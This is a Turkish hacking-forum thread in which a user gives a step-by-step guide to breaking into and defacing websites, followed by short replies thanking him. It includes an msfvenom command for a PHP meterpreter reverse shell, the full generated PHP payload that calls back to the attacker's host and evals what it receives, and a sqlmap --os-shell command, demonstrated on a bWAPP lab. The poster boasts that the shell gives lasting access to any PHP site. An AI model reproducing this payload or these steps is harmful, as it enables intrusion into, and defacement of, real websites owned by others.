İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

[Dev konu]Kendi Shell'iniz ile İndex Basmak!! [Resimli Anlatım]

26-03-2017 17:26
#1
DUMPPER - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
599
Teşekkür (Etti):
16
Teşekkür (Aldı):
33
Konular:
123
Ticaret:
(0) %
ÖNCELİKLE HERKESE MERHABALAR BEN DUMPPER

BU SHELL İÇİN ;
1-KALİ LİNUX 2.00
2-BİR ADET AÇIKLI SİTE
3-BRUPSUİTE
4-BİRAZCIKTA İNTERNET

EVET ÖNCELİKLE TERMİNALDEN M-E-T-A-SPLOİTE GEÇELİM
ARDINDAN ŞU KODLARI YAZALIM;

Kod:
msfvenom -p php/meterpreter/reverse_tcp LHOST=kendi ip iniz LPORT=6666
[SİZE="4"]LPORT=6666 BURDAKİ 6666 RAKAMINI DEĞİŞTİRE BİLİRSİNİZ FAKAT KOYACAĞINIZ PORT PC NİZDE BULUNMASIN ÖRNEĞİN 80 YAZMAYIN.
ARDINDAN KARŞIMIZA BÖYLE KODLAR GELECEKTİR;
Kod:
/*<?php /**/ error_reporting(0); $ip = 'KENDİ İPİNİZ; $port = 6666; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();
BU KODLARI KOPYALAYIN VE ARDINDAN .......[/SİZE]
SQL İLE ANA SAYFAYA İNDEX BASMAK
[SİZE="4"]BEN BWapp I ÖRNEK VERECEĞİM ARKADAŞLAR...
[/SİZE]

Burpsuite i açarak uygulamızıda açıyoruz ‘ işareti ile kontrol ettiğimizde resimdeki gibi sqli olduğuna dair bizi mutlu eden hatayla karşılaşıyoruz.Aynı zamanda burp ilede cookiemize ulaşabiliyoruz.

Daha sonra sqlmap ile url ve cookie mizi aşağıdaki parametrelerle birlikte –os-shell ekleyerek çalıştırıyoruz.
Kod:
    
sqlmap -u "http://192.168.237.135/bWAPP/sqli_1.php?title=%C4%B1ronman&action=search" --cookie="security_level=0; PHPSESSID=4e4cf5609dfa54a19f3ee164c8d21f75" --os-shell

Sqlmap komutumuzu çalıştırdığımızda bize yukarıdaki gibi hedef sistemin dilini soruyor bu yazılım için php yani 4 diyerek devam ediyoruz.

Daha sonra dosyamızın nereye yükleneceğini soruyor burada 1 i seçerek devam ediyoruz.

Daha sonra dosyamızın yüklendiği adresleri yukarıda gördüğünüz gibi göstermekte.

192.168.237.135/tmpuidmm.php adresine gittiğimizde shellimizi yükleyebileceğimiz bir sayfa gelmekte.

VE ARDINDAN UPLOAD YERİ GELİR.....

İŞTE BURAYA KENDİ SHELLİMİZİ ATIYORUZ....

İŞTE SHELLİMİZLE SİTEYE SIZDIK.
PEKİ İNTERNETTEKİ SHELL LER İLE BU SHELLİN ARASINDAKİ FARK NE?
ÖNCELİKE BUSHELL PHP ÇALIŞAN HER SİSTEME SIZABİLİRLER
VE BU SHELL İLE SIZDIĞINIZ HER SİTE HER ZAMAN SİZİNDİR (ARMİTAGE KULLANILMASI ŞART ORASIDA AYNI...)

TEŞEKKÜR ETMEYİ UNUTMAYIN EMEĞE SAYGI
KULLANILAN KAYNAKLAR
1-RESİMLER İÇİN TIKLA GİT
2-BWApp RESİMLERİ VE BRUP SUİTE RESİMLERİ İÇİN TIKLA SİTEYE GİT
Kullanıcı İmzası
┏╋━━━━━━━━━━━━◢◤✯✯✯✯◥◣━━━━━━━━━━━╋
Dumpper VOL BİLMEM KAÇ
◥◣▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬◢◤
Konu Ƴαĸαмoz1Յ1Գ tarafından (07-08-2017 10:38 Saat 10:38 ) değiştirilmiştir.
Byhard01, 'Unnamed, flatrom21 Teşekkür etti.

26-03-2017 17:55
#2
DUMPPER - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
599
Teşekkür (Etti):
16
Teşekkür (Aldı):
33
Konular:
123
Ticaret:
(0) %
KİMSE OKUMAMIŞ
Kullanıcı İmzası
┏╋━━━━━━━━━━━━◢◤✯✯✯✯◥◣━━━━━━━━━━━╋
Dumpper VOL BİLMEM KAÇ
◥◣▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬◢◤
26-03-2017 17:57
#3
Belo212 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2016
Nereden:
NevŞehir
Mesajlar:
691
Teşekkür (Etti):
105
Teşekkür (Aldı):
49
Konular:
14
Ticaret:
(0) %
Ben okudum.

işareti ": trl" (boşluksuz) ile yapılıyor.
Kullanıcı İmzası
Ne kadar bilirsen bil; söylediklerin karşındakinin anladığı kadardır.
Mevlânâ Celaleddin-i Rumi
26-03-2017 18:03
#4
Lord of Pc - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2017
Nereden:
Mexico
Mesajlar:
163
Teşekkür (Etti):
57
Teşekkür (Aldı):
12
Konular:
1
Ticaret:
(0) %
Eline sağlık hocam.
Kullanıcı İmzası
Herşey üstüne gelip,seni dayanamayacağın bir noktaya getirdiğinde, Sakın vazgeçme! İŞTE ORASI KADERİNİN DEĞİŞECEĞİ NOKTADIR!!!
26-03-2017 18:05
#5
DUMPPER - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
599
Teşekkür (Etti):
16
Teşekkür (Aldı):
33
Konular:
123
Ticaret:
(0) %
Alıntı:
Belo212´isimli üyeden Alıntı Mesajı göster
Ben okudum.

işareti ": trl" (boşluksuz) ile yapılıyor.
SAOL :tr: BÖYLEMİ YOKSA trl : BAYAĞI DENEDİM SAOLUN OKUDUĞUNUZ İÇİN
Kullanıcı İmzası
┏╋━━━━━━━━━━━━◢◤✯✯✯✯◥◣━━━━━━━━━━━╋
Dumpper VOL BİLMEM KAÇ
◥◣▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬◢◤
26-03-2017 18:05
#6
DUMPPER - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
599
Teşekkür (Etti):
16
Teşekkür (Aldı):
33
Konular:
123
Ticaret:
(0) %
Alıntı:
lord of pc´isimli üyeden Alıntı Mesajı göster
eline sağlık hocam.
teşekkür ederim
Kullanıcı İmzası
┏╋━━━━━━━━━━━━◢◤✯✯✯✯◥◣━━━━━━━━━━━╋
Dumpper VOL BİLMEM KAÇ
◥◣▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬◢◤
26-03-2017 18:16
#7
versen5656 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2015
Mesajlar:
3.321
Teşekkür (Etti):
10
Teşekkür (Aldı):
354
Konular:
68
Ticaret:
(0) %
biraz karışık ama e.s
Kullanıcı İmzası
10101010101010100101010100000101010101
1111 0000 1111 000 111 000 11100 11111 00000 1111 0000 000111 188 177 191 178 185 184 186 187 192 193 190 178 179 175 176 194 195 196 197
101010101010101010100101
26-03-2017 18:22
#8
DUMPPER - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
599
Teşekkür (Etti):
16
Teşekkür (Aldı):
33
Konular:
123
Ticaret:
(0) %
Aynen ama silbaştan olduğu için yoksa daha az ayrıntılısıda var o yüzden adı #1 di 2. De var o daha kolay bi 5dk nızı alır
Kullanıcı İmzası
┏╋━━━━━━━━━━━━◢◤✯✯✯✯◥◣━━━━━━━━━━━╋
Dumpper VOL BİLMEM KAÇ
◥◣▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬◢◤
07-08-2017 08:51
#9
DUMPPER - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
599
Teşekkür (Etti):
16
Teşekkür (Aldı):
33
Konular:
123
Ticaret:
(0) %
Alıntı:
versen5656´isimli üyeden Alıntı Mesajı göster
biraz karışık ama e.s
EDİTLENMİŞTİR RESİM VE SQLMAP İLE SHELL ATMA EKLENMİŞTİR
BWApp UYGULAMASI İLE ÖRNEKLENDİRİLMİŞTİR
Kullanıcı İmzası
┏╋━━━━━━━━━━━━◢◤✯✯✯✯◥◣━━━━━━━━━━━╋
Dumpper VOL BİLMEM KAÇ
◥◣▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬◢◤
07-08-2017 10:05
#10
'Unnamed - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
Utopia
Mesajlar:
1.402
Teşekkür (Etti):
463
Teşekkür (Aldı):
301
Konular:
121
Ticaret:
(0) %
2006 yılından günümüze kadar açılan konuları takip ettim. Gördüm ki, hep alıntı hep alıntı. Ayrıca özgün konulara da değer verilmemiş. Forumun gelişmesi, konuyu açanların ve de okuyanların performansına paralel seyir izliyor. Bu acıklıydı.
- Dostum, seni bu konun için tebrik eder ve devamını da dilerim. Bunun yanında teşekkürümü de veriyorum.
Kullanıcı İmzası
" Zaman sizi sevdiklerinizden ayırmadan önce siz sevdiklerinize zaman ayırın "

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı